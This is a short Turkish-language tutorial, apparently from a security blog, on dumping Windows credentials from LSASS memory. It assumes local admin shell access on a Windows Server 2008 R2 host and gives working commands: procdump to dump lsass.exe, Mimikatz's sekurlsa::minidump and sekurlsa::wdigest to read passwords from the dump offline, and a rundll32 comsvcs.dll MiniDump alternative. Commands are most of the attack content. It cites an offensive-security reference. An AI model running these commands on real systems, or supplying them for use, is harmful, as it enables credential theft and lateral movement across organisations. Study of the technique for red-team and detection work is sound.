WCE ve Mimikatz araçları temel olarak RAM üzerinde bulunan kimlik doğrulama paketlerindeki (authentication packages) kimlik bilgilerini (şifreli parola ve parola özetlerini, kullanıcı adı gibi) okur, parolayı (ve MSV1_0.dll için parola özetini) şifreleyen şifreleme anahtarını elde eder. Sonrasında ise, şifreli kimlik bilgilerini çözer (deşifre eder). Bu yazıda, DCMakinesi adlı 64 bit mimarideki Windows Server 2008 R2 bilgisayarda yerel yönetici hakları ile komut satırı erişimi sağlanabildiği varsayılacaktır. Komut satırı erişimi sağlandıktan sonra LSASS prosesinin dump dosyası ele geçirilirse, oturumu açık olan veya bir şekilde kimlik doğrulaması gerçekleştiren hesaplara (bu yazı için Administrator, Jale ve Zeynep) ait kimlik bilgileri elde edilebilir. Bu amaçla, öncelikle hedef sisteme Windows Systernals aracı olan Procdump aracı indirilir. Bu araç kullanılarak LSASS prosesinin dump hali elde edilir.
procdump.exe -accepteula -ma lsass.exe LSASS_Prosesi.dmp
Dump dosyası, aynı mimariye sahip (64 bit mimarideki Windows 7 veya Windows Server 2008 R2) bir bilgisayara taşınıp Mimikatz aracına parametre olarak verilirse, LSASS prosesinde kayıtlı olan kimlik bilgileri elde edilebilmektedir.
mimikatz.exe “sekurlsa::minidump LSASS_Prosesi.dmp” “sekurlsa::wdigest” exit
Komut çıktısının devamında kimlik bilgilerinin olduğu görülmektedir.
Not: Benzer olarak kullanılabilecek bir başka komut da aşağıdaki gibidir.
Powershell.exe -c C:\Windows\System32\rundll32.exe “C:\windows\System32\comsvcs.dll”, MiniDump (Get-Process lsass).id C:\temp\lsass.dmp full
Kaynaklar:
https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz